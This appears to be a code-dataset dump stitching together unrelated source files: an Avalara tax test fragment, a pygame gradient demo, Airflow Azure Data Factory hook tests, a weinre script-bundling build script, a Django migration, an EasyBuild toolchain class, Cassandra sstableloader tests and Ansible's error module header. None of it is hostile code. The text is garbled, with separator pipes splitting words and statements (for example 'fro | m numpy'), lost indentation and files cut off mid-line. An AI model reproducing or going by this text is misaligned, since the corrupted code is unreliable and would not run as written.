        doc.add_from_address(from_address)
    assert e.value.code == AvalaraException.CODE_HAS_FROM
    with pytest.raises(AvalaraException) as e:
        doc.add_to_address(to_address)
    assert e.value.code == AvalaraException.CODE_HAS_TO
    line = Line(Amount=10.00)
    doc.add_line(line)
    doc.validate()
    # Argument validation on the API entry point itself.
    api = get_api()
    lat = 47.627935
    lng = -122.51702
    with pytest.raises(AvalaraTypeException) as e:
        api.get_tax(lat, lng, 'foo', None)
    assert e.value.code == AvalaraException.CODE_BAD_DOC
    with pytest.raises(AvalaraException) as e:
        api.get_tax(lat, lng, None, None)
    assert e.value.code == AvalaraException.CODE_BAD_ARGS
@pytest.mark.post_tax
@pytest.mark.testing
def test_justtozip():
api = get_api()
doc = Document.new_sales_order(DocDate=datetime.date.today(), CustomerCode='jobelenus@activefrequency.com')
doc.add_from_address(Line1="100 Ravine Lane NE", Line2="#220", PostalCode="98110")
doc.add_to_address(Line1="", Line2="", PostalCode="98110")
doc.add_line(Amount=10.00)
doc.add_line(Amount=10.00)
doc.add_line(TaxCode='FR', Amount='10.00')
# make sure i don't have a doccode
try:
doc.DocCode
|
mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/examples/vgrade.py | Python | agpl-3.0 | 3,320 | 0.005422 | #!/usr/bin/env python
"""This example demonstrates creating an image with numpy
python, and displaying that through SDL. You can look at the
method of importing numpy and pygame.surfarray. This method
will fail 'gracefully' if it is not available.
I've tried mixing in a lot of comments where the code might
not be self explanatory, nonetheless it may still seem a bit
strange. Learning to use numpy for images like this takes a
bit of learning, but the payoff is extremely fast image
manipulation in python.
For Pygame 1.9.2 and up, this example also showcases a new feature
of surfarray.blit_surface: array broadcasting. If a source array
has either a width or height of 1, the array is repeatedly blitted
to the surface along that dimension to fill the surface. In fact,
a (1, 1) or (1, 1, 3) array results in a simple surface color fill.
Just so you know how this breaks down: for each sampling of
time, 30% goes to each of creating the gradient and blitting the
array, and the final 40% goes to flipping/updating the display surface.
If using an SDL version at least 1.1.8 the window will have
no border decorations.
The code also demonstrates use of the timer events."""
import os, pygame
from pygame.locals import *
try:
from numpy import *
fro | m numpy.random import *
except ImportError:
raise SystemExit('This example requires numpy and the pygame surfarray module')
pygame.surfarray.use_arraytype('numpy')
# Tick count (ms) recorded by the previous stopwatch() call.
timer = 0
def stopwatch(message = None):
    "simple routine to time python code"
    global timer
    # Called without a message: just (re)start the clock.
    if not message:
        timer = pygame.time.get_ticks()
        return
    # Called with a message: report elapsed time since the last call, then restart.
    now = pygame.time.get_ticks()
    # The +.001 keeps runtime nonzero so the fps division below cannot fail.
    runtime = (now - timer)/1000.0 + .001
    print ("%s %s %s" %
           (message, runtime, ('seconds\t(%.2ffps)'%(1.0/runtime))))
    timer = now
def VertGradientColumn(surf, topcolor, bottomcolor):
    "creates a new 3d vertical gradient array"
    # Work in numpy so the per-row interpolation happens in native code.
    topcolor = array(topcolor, copy=0)
    bottomcolor = array(bottomcolor, copy=0)
    diff = bottomcolor - topcolor
    width, height = surf.get_size()
    # create array from 0.0 to 1.0 triplets
    column = arange(height, dtype='float')/height
    column = repeat(column[:, newaxis], [3], 1)
    # create a single column of gradient
    column = topcolor + (diff * column).astype('int')
    # make the column a 3d image column by adding X
    column = column.astype('uint8')[newaxis,:,:]
    #3d array into 2d array
    # map_array converts the (1, height, 3) RGB column into mapped pixel values;
    # the width-1 result is broadcast across the surface by blit_array (Pygame 1.9.2+).
    return pygame.surfarray.map_array(surf, column)
def DisplayGradient(surf):
    "choose random colors and show them"
    # Time the whole gradient-build + blit + flip cycle via stopwatch().
    stopwatch()
    # Two random RGB triplets: gradient top and bottom.
    colors = randint(0, 255, (2, 3))
    column = VertGradientColumn(surf, colors[0], colors[1])
    pygame.surfarray.blit_array(surf, column)
    pygame.display.flip()
    stopwatch('Gradient:')
def main():
    """Open a borderless window and repaint a random gradient twice a second."""
    pygame.init()
    pygame.mixer.quit() # remove ALSA underflow messages for Debian squeeze
    size = 600, 400
    os.environ['SDL_VIDEO_CENTERED'] = '1'
    screen = pygame.display.set_mode(size, NOFRAME, 0)
    pygame.event.set_blocked(MOUSEMOTION) #keep our queue cleaner
    # A USEREVENT every 500ms drives the repaint below.
    pygame.time.set_timer(USEREVENT, 500)
    # Block on the event queue; exit on quit/key/click, repaint on the timer.
    while 1:
        event = pygame.event.wait()
        if event.type in (QUIT, KEYDOWN, MOUSEBUTTONDOWN):
            break
        elif event.type == USEREVENT:
            DisplayGradient(screen)
if __name__ == '__main__': main()
|
dhuang/incubator-airflow | tests/providers/microsoft/azure/hooks/test_azure_data_factory.py | Python | apache-2.0 | 15,858 | 0.004414 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from unittest.mock import MagicMock, Mock
import pytest
from pytest import fixture
from airflow.exceptions import AirflowException
from airflow.models.connection import Connection
from airflow.providers.microsoft.azure.hooks.azure_data_factory import (
AzureDataFactoryHook,
provide_targeted_factory,
)
from airflow.utils import db
# Connection-level defaults (stored in the test Connection's extras) versus
# explicit per-call overrides used by the parametrized tests below.
DEFAULT_RESOURCE_GROUP = "defaultResourceGroup"
RESOURCE_GROUP = "testResourceGroup"
DEFAULT_FACTORY = "defaultFactory"
FACTORY = "testFactory"
MODEL = object()  # opaque sentinel passed through to the mocked SDK client
NAME = "testName"
ID = "testId"
def setup_module():
    # Register the Azure Data Factory connection used by every test in this
    # module; the extras carry the default resource group and factory that
    # provide_targeted_factory falls back to.
    connection = Connection(
        conn_id="azure_data_factory_test",
        conn_type="azure_data_factory",
        login="clientId",
        password="clientSecret",
        extra=json.dumps(
            {
                "tenantId": "tenantId",
                "subscriptionId": "subscriptionId",
                "resourceGroup": DEFAULT_RESOURCE_GROUP,
                "factory": DEFAULT_FACTORY,
            }
        ),
    )
    db.merge_conn(connection)
@fixture
def hook():
    # Hook bound to the test connection, with the real ADF client replaced by
    # a spec'd MagicMock so tests can assert on SDK calls without Azure access.
    client = AzureDataFactoryHook(conn_id="azure_data_factory_test")
    client._conn = MagicMock(
        spec=[
            "factories",
            "linked_services",
            "datasets",
            "pipelines",
            "pipeline_runs",
            "triggers",
            "trigger_runs",
        ]
    )
    return client
def parametrize(explicit_factory, implicit_factory):
    # Build a pytest.mark.parametrize decorator with two cases: the caller
    # passing resource_group/factory explicitly, and the caller relying on the
    # connection defaults. Each case is a (user_args, sdk_args) pair.
    def wrapper(func):
        return pytest.mark.parametrize(
            ("user_args", "sdk_args"),
            (explicit_factory, implicit_factory),
            ids=("explicit factory", "implicit factory"),
        )(func)
    return wrapper
def test_provide_targeted_factory():
    """The decorator passes explicit args through, falls back to connection
    extras, and raises when neither source supplies the factory target."""
    def echo(_, resource_group_name=None, factory_name=None):
        return resource_group_name, factory_name
    conn = MagicMock()
    hook = MagicMock()
    hook.get_connection.return_value = conn
    # Explicit arguments win even with empty extras.
    conn.extra_dejson = {}
    assert provide_targeted_factory(echo)(hook, RESOURCE_GROUP, FACTORY) == (RESOURCE_GROUP, FACTORY)
    # No arguments: fall back to the connection's defaults.
    conn.extra_dejson = {"resourceGroup": DEFAULT_RESOURCE_GROUP, "factory": DEFAULT_FACTORY}
    assert provide_targeted_factory(echo)(hook) == (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)
    # Neither arguments nor defaults: must raise.
    with pytest.raises(AirflowException):
        conn.extra_dejson = {}
        provide_targeted_factory(echo)(hook)
# Each test below drives one AzureDataFactoryHook wrapper and verifies that the
# mocked SDK client receives the expected (resource_group, factory, ...)
# arguments, both when the factory is named explicitly and when it comes from
# the connection defaults.
@parametrize(
    explicit_factory=((RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY)),
    implicit_factory=((), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)),
)
def test_get_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.get_factory(*user_args)
    hook._conn.factories.get.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
    implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_create_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.create_factory(*user_args)
    hook._conn.factories.create_or_update.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
    implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_update_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
    # Update only proceeds when the factory already exists.
    hook._factory_exists = Mock(return_value=True)
    hook.update_factory(*user_args)
    hook._conn.factories.create_or_update.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
    implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_update_factory_non_existent(hook: AzureDataFactoryHook, user_args, sdk_args):
    # Updating a missing factory must fail loudly rather than create one.
    hook._factory_exists = Mock(return_value=False)
    with pytest.raises(AirflowException, match=r"Factory .+ does not exist"):
        hook.update_factory(*user_args)
@parametrize(
    explicit_factory=((RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY)),
    implicit_factory=((), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)),
)
def test_delete_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.delete_factory(*user_args)
    hook._conn.factories.delete.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
    implicit_factory=((NAME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_get_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.get_linked_service(*user_args)
    hook._conn.linked_services.get.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
    implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_create_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
    """Creating a linked service delegates to the SDK's create_or_update."""
    hook.create_linked_service(*user_args)
    # BUGFIX: the original invoked the mock (recording a call) instead of
    # asserting on it, so this test could never fail.
    hook._conn.linked_services.create_or_update.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
    implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
    """Updating an existing linked service delegates to create_or_update."""
    # Update only proceeds when the linked service already exists.
    hook._linked_service_exists = Mock(return_value=True)
    hook.update_linked_service(*user_args)
    # BUGFIX: same as above — assert the SDK call instead of performing one.
    hook._conn.linked_services.create_or_update.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
    implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_linked_service_non_existent(hook: AzureDataFactoryHook, user_args, sdk_args):
    # Updating a missing linked service must fail rather than create one.
    hook._linked_service_exists = Mock(return_value=False)
    with pytest.raises(AirflowException, match=r"Linked service .+ does not exist"):
        hook.update_linked_service(*user_args)
@parametrize(
    explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
    implicit_factory=((NAME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_delete_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.delete_linked_service(*user_args)
    hook._conn.linked_services.delete.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
    implicit_factory=((NAME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_get_dataset(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.get_dataset(*user_args)
    hook._conn.datasets.get.assert_called_with(*sdk_args)
@parametrize(
    explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
    implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_create_dataset(hook: AzureDataFactoryHook, user_args, sdk_args):
    hook.create_dataset(*user_args)
    hook._conn.datasets.create_or_update.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_dataset(hoo |
kyungmi/webida-server | src/ext/cordova-weinre/weinre.build/scripts/build-target-scripts.py | Python | apache-2.0 | 5,339 | 0.008054 | #!/usr/bin/env python
# ---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ---
import os
import re
import sys
import json
import optparse
#--------------------------------------------------------------------
def main():
    """Merge the weinre target scripts from srcDir into two bundles in outputDir:
    target-script.js (eval-wrapped, debuggable) and target-script-min.js (minified)."""
    #----------------------------------------------------------------
    # Validate command-line arguments: srcDir outputDir, both must be directories.
    if len(sys.argv) < 3:
        error("expecting parameters srcDir outputDir")
    srcDirName = sys.argv[1]
    oDirName = sys.argv[2]
    if not os.path.exists(srcDirName): error("source directory not found: '" + srcDirName + "'")
    if not os.path.isdir(srcDirName): error("source directory not a directory: '" + srcDirName + "'")
    if not os.path.exists(oDirName): error("output directory not found: '" + oDirName + "'")
    if not os.path.isdir(oDirName): error("output directory not a directory: '" + oDirName + "'")
    #----------------------------------------------------------------
    # Collect the scripts in load order: module loader first, then the
    # common and target modules, then the generated IDL bundle.
    scripts = []
    scriptNames = {}
    scriptSrc = {}
    scriptMin = {}
    includedFiles = []
    includedFiles.append("modjewel.js")
    entries = os.listdir(os.path.join(srcDirName, "weinre/common"))
    for entry in entries:
        includedFiles.append("weinre/common/%s" % entry)
    entries = os.listdir(os.path.join(srcDirName, "weinre/target"))
    for entry in entries:
        includedFiles.append("weinre/target/%s" % entry)
    includedFiles.append("interfaces/all-json-idls-min.js")
    # Read each script once, keeping both the raw and the minified source.
    for includedFile in includedFiles:
        baseScriptFile = includedFile
        scriptFile = os.path.join(srcDirName, baseScriptFile)
        if not os.path.exists(scriptFile):
            error("script file not found: '" + scriptFile + "'")
        scripts.append(scriptFile)
        scriptNames[scriptFile] = baseScriptFile
        with open(scriptFile, "r") as iFile:
            scriptSrc[scriptFile] = iFile.read()
        scriptMin[scriptFile] = min(scriptSrc[scriptFile])
        # log("read: %s" % scriptFile)
    #----------------------------------------------------------------
    # Debug bundle: raw sources, eval-wrapped so each keeps its sourceURL.
    oFileName = os.path.join(oDirName, "target-script.js")
    writeMergedFile(oFileName, scripts, scriptNames, scriptSrc, True)
    #----------------------------------------------------------------
    # Production bundle: minified sources concatenated directly.
    oFileName = os.path.join(oDirName, "target-script-min.js")
    writeMergedFile(oFileName, scripts, scriptNames, scriptMin, False)
#--------------------------------------------------------------------
def writeMergedFile(oFileName, scripts, scriptNames, srcs, useEval):
    """Write a single JS bundle to oFileName. With useEval, each script is
    wrapped in eval() with a //@ sourceURL comment so debuggers show the
    original file names; otherwise the sources are concatenated directly."""
    lines = []
    # The Apache license header is prepended verbatim.
    licenseFile = os.path.join(os.path.dirname(__file__), "..", "LICENSE-header.js")
    with open(licenseFile, "r") as iFile:
        lines.append(iFile.read())
    # Whole bundle runs inside one IIFE to avoid leaking globals.
    lines.append(";(function(){")
    for script in scripts:
        src = srcs[script]
        srcName = scriptNames[script]
        if not useEval:
            lines.append("// %s" % srcName)
            lines.append(src)
            lines.append(";")
        else:
            # json.dumps gives us a safely-escaped JS string literal.
            src = "%s\n//@ sourceURL=%s" % (src, srcName)
            lines.append(";eval(%s)" % json.dumps(src))
        # Right after the module loader itself is defined, turn on its
        # recursive-require warning.
        if srcName == "modjewel.js":
            lines.append("modjewel.require('modjewel').warnOnRecursiveRequire(true);")
    if not useEval:
        lines.append("")
    lines.append("// modjewel.require('weinre/common/Weinre').showNotImplemented();")
    lines.append("modjewel.require('weinre/target/Target').main()")
    lines.append("})();")
    targetScript = "\n".join(lines)
    with open(oFileName, "w") as oFile:
        oFile.write(targetScript)
    log("generated: %s" % oFileName)
#--------------------------------------------------------------------
def min(script):
patternCommentC = re.compile(r"/\*.*?\*/", re.MULTILINE + re.DOTALL)
patternCommentCPP = re.compile(r"(?<!\\)//.*?$", re.MULTILINE)
patternIndent = re.compile(r"^\s*", re.MULTILINE)
patternBlankLine = re.compile(r"^\s*\n", re.MULTILINE)
script = patternCommentC.sub( "", script)
script = patternCommentCPP.sub( "", script)
script = patternIndent.sub( "", script)
script = patternBlankLine.sub( "", script)
return script
#--------------------------------------------------------------------
def log(message):
    # Prefix every message with the script name and write to stderr
    # (Python 2 print-chevron syntax; this script targets Python 2).
    message = "%s: %s" % (PROGRAM_NAME, message)
    print >>sys.stderr, message
#--------------------------------------------------------------------
def error(message):
    # Log the message and abort the build with a failing exit code.
    log(message)
    sys.exit(-1)
#--------------------------------------------------------------------
# Script entry point: remember our own name for log prefixes, then run.
PROGRAM_NAME = os.path.basename(sys.argv[0])
main()
|
azavea/nyc-trees | src/nyc_trees/apps/core/migrations/0021_auto_20150408_1216.py | Python | agpl-3.0 | 660 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds two per-user one-shot UI flags, defaulting to False for existing
    # rows: whether the progress-page and reservations-page help overlays
    # have already been shown.
    dependencies = [
        ('core', '0020_auto_20150323_1457'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='progress_page_help_shown',
            field=models.BooleanField(default=False),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='user',
            name='reservations_page_help_shown',
            field=models.BooleanField(default=False),
            preserve_default=True,
        ),
    ]
|
gppezzi/easybuild-framework | easybuild/toolchains/cgmvapich2.py | Python | gpl-2.0 | 1,589 | 0.001888 | ##
# Copyright 2013-2019 Ghent University
#
# T | his file is triple-licensed under GPLv2 (see below), MIT, and
# BSD three-clause licenses.
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent Univ | ersity (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for cgmvapich2 compiler toolchain (includes Clang, GFortran and MVAPICH2).
:author: Dmitri Gribenko (National Technical University of Ukraine "KPI")
"""
from easybuild.toolchains.clanggcc import ClangGcc
from easybuild.toolchains.mpi.mvapich2 import Mvapich2
class Cgmvapich2(ClangGcc, Mvapich2):
    """Compiler toolchain with Clang, GFortran and MVAPICH2."""
    NAME = 'cgmvapich2'
    # The compiler-only Clang/GCC toolchain is the parent; MVAPICH2 adds MPI.
    SUBTOOLCHAIN = ClangGcc.NAME
|
aweisberg/cassandra-dtest | sstable_generation_loading_test.py | Python | apache-2.0 | 17,757 | 0.003097 | import os
import subprocess
import time
import distutils.dir_util
from distutils.version import LooseVersion
import pytest
import logging
from ccmlib import common as ccmcommon
from dtest import Tester, create_ks, create_cf, MAJOR_VERSION_4
from tools.assertions import assert_all, assert_none, assert_one
since = pytest.mark.since
logger = logging.getLogger(__name__)
# WARNING: sstableloader tests should be added to TestSSTableGenerationAndLoading (below),
# and not to BaseSStableLoaderTest (which is shared with upgrade tests)
# Also used by upgrade_tests/storage_engine_upgrade_test
# to test loading legacy sstables
class TestBaseSStableLoader(Tester):
    @pytest.fixture(autouse=True)
    def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
        # sstableloader runs can log expected errors; don't fail the test on them.
        fixture_dtest_setup.allow_log_errors = True
    # Subclasses (upgrade tests) override these: the version whose sstables
    # are generated, and whether to exercise COMPACT STORAGE tables.
    upgrade_from = None
    test_compact = False
    def compact(self):
        # COMPACT STORAGE is only used on pre-4.0 clusters, and only on request.
        return self.fixture_dtest_setup.cluster.version() < MAJOR_VERSION_4 and self.test_compact
    def create_schema(self, session, ks, compression):
        # RF=2 keyspace with one regular and one counter table, using the
        # requested compression and optional COMPACT STORAGE.
        create_ks(session, ks, rf=2)
        create_cf(session, "standard1", compression=compression, compact_storage=self.compact())
        create_cf(session, "counter1", compression=compression, columns={'v': 'counter'},
                  compact_storage=self.compact())
    def skip_base_class_test(self):
        # Only subclasses that set upgrade_from should actually run these tests.
        # NOTE(review): 'TestBasedSSTableLoader' does not match this class's
        # actual name ('TestBaseSStableLoader'), so the first clause is always
        # True and the skip effectively depends on upgrade_from alone —
        # confirm whether the string is a typo.
        if self.__class__.__name__ != 'TestBasedSSTableLoader' and self.upgrade_from is None:
            pytest.skip("Don't need to run base class test, only derived classes")
    def create_schema_40(self, session, ks, compression):
        # 4.0 variant of create_schema: the counter table is declared with an
        # explicit clustering column (no COMPACT STORAGE available post-4.0).
        create_ks(session, ks, rf=2)
        create_cf(session, "standard1", compression=compression, compact_storage=self.compact())
        create_cf(session, "counter1", key_type='text', compression=compression, columns={'column1': 'text',
                                                                                          'v': 'counter static',
                                                                                          'value': 'counter'},
                  primary_key="key, column1", clustering='column1 ASC', compact_storage=self.compact())
    # Matrix of compression round-trips: sstables written under one compression
    # setting are streamed into tables configured with another. Each test
    # delegates to load_sstable_with_configuration and skips on the base class.
    def test_sstableloader_compression_none_to_none(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration(None, None)
    def test_sstableloader_compression_none_to_snappy(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration(None, 'Snappy')
    def test_sstableloader_compression_none_to_deflate(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration(None, 'Deflate')
    def test_sstableloader_compression_snappy_to_none(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Snappy', None)
    def test_sstableloader_compression_snappy_to_snappy(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Snappy', 'Snappy')
    def test_sstableloader_compression_snappy_to_deflate(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Snappy', 'Deflate')
    def test_sstableloader_compression_deflate_to_none(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Deflate', None)
    def test_sstableloader_compression_deflate_to_snappy(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Deflate', 'Snappy')
    def test_sstableloader_compression_deflate_to_deflate(self):
        self.skip_base_class_test()
        self.load_sstable_with_configuration('Deflate', 'Deflate')
    def test_sstableloader_with_mv(self):
        """
        Loading sstables into a table that has a materialized view.
        @jira_ticket CASSANDRA-11275
        """
        self.skip_base_class_test()
        def create_schema_with_mv(session, ks, compression):
            # Standard schema plus a view, so the loader must also rebuild
            # the view from the streamed base-table data.
            self.create_schema(session, ks, compression)
            # create a materialized view
            session.execute("CREATE MATERIALIZED VIEW mv1 AS "
                            "SELECT key FROM standard1 WHERE key IS NOT NULL AND c IS NOT NULL AND v IS NOT NULL "
                            "PRIMARY KEY (v)")
        self.load_sstable_with_configuration(ks='"Keyspace1"', create_schema=create_schema_with_mv)
    def copy_sstables(self, cluster, node):
        # Snapshot every non-system keyspace from each data directory into a
        # parallel 'dataN_copy' tree, so load_sstables can stream from the
        # copies after the originals are wiped/upgraded.
        for x in range(0, cluster.data_dir_count):
            data_dir = os.path.join(node.get_path(), 'data{0}'.format(x))
            copy_root = os.path.join(node.get_path(), 'data{0}_copy'.format(x))
            for ddir in os.listdir(data_dir):
                keyspace_dir = os.path.join(data_dir, ddir)
                if os.path.isdir(keyspace_dir) and ddir != 'system':
                    copy_dir = os.path.join(copy_root, ddir)
                    distutils.dir_util.copy_tree(keyspace_dir, copy_dir)
    def load_sstables(self, cluster, node, ks):
        # Run the sstableloader binary against every table directory that
        # copy_sstables saved for keyspace `ks`, and require a zero exit status.
        cdir = node.get_install_dir()
        sstableloader = os.path.join(cdir, 'bin', ccmcommon.platform_binary('sstableloader'))
        env = ccmcommon.make_cassandra_env(cdir, node.get_path())
        host = node.address()
        for x in range(0, cluster.data_dir_count):
            # ks may arrive quoted (e.g. '"Keyspace1"'); the directory name is unquoted.
            sstablecopy_dir = os.path.join(node.get_path(), 'data{0}_copy'.format(x), ks.strip('"'))
            for cf_dir in os.listdir(sstablecopy_dir):
                full_cf_dir = os.path.join(sstablecopy_dir, cf_dir)
                if os.path.isdir(full_cf_dir):
                    cmd_args = [sstableloader, '--nodes', host, full_cf_dir]
                    p = subprocess.Popen(cmd_args, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
                    stdout, stderr = p.communicate()
                    exit_status = p.returncode
                    logger.debug('stdout: {out}'.format(out=stdout.decode("utf-8")))
                    logger.debug('stderr: {err}'.format(err=stderr.decode("utf-8")))
                    assert 0 == exit_status, \
                        "sstableloader exited with a non-zero status: {}".format(exit_status)
def load_sstable_with_configuration(self, pre_compression=None, post_compression=None, ks="ks", create_schema=create_schema):
"""
tests that the sstableloader works by using it to load data.
Compression of the columnfamilies being loaded, and loaded into
can be specified.
pre_compression and post_compression can be these values:
None, 'Snappy', or 'Deflate'.
"""
NUM_KEYS = 1000
for compression_option in (pre_compression, post_compression):
assert compression_option in (None, 'Snappy', 'Deflate')
logger.debug("Testing sstableloader with pre_compression=%s and post_compression=%s" % (pre_compression, post_compression))
if self.upgrade_from:
logger.debug("Testing sstableloader with upgrade_from=%s and compact=%s" % (self.upgrade_from, self.compact))
cluster = self.cluster
if self.upgrade_from:
logger.debug("Generating sstables with version %s" % (self.upgrade_from))
default_install_version = self.cluster.version()
default_install_dir = self.cluster.get_install_dir()
# Forcing cluster version on purpose
cluster.set_install_dir(version=self.upgrade_from)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
logger.debug("Using jvm_args={}".format(self.jvm_args))
cluster.populate(2).start(jvm_args=list(self.jvm_args))
node1, node2 = cluster.nodelist()
time.sleep(.5)
logger.debug("creating keyspace and inserting")
session = self.cql_connection(node1)
self.create_schema(session, ks, pre_compression)
for i in range(NUM_KEYS):
session.execute("UPDATE standard1 SET v='{}' WHERE KEY='{}' AND c='col'".format(i, i))
session.execute("UPDATE counter1 SET v=v+1 WHERE KEY='{}'".format(i))
#Will upgrade to a version that doesn't support compact storage so revert the compact
#storage, this doesn't actually fix it yet
if self.compact() and default_install_version >= MAJOR_VERSION_4:
session.execute('alter table standa |
timkral/horn | heimdall/setup/__init__.py | Python | bsd-3-clause | 21 | 0 | __author__ | = 'tkral | '
|
bootswithdefer/ansible | v2/ansible/errors/__init__.py | Python | gpl-3.0 | 6,977 | 0.004586 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors.yaml_strings import *
class AnsibleError(Exception):
    '''
    This is the base class for all errors raised from Ansible code,
    and can be instantiated with two optional parameters beyond the
    error message to control whether detailed information is displayed
    when the error occurred while parsing a data file of some kind.

    Usage:

        raise AnsibleError('some message here', obj=obj, show_content=True)

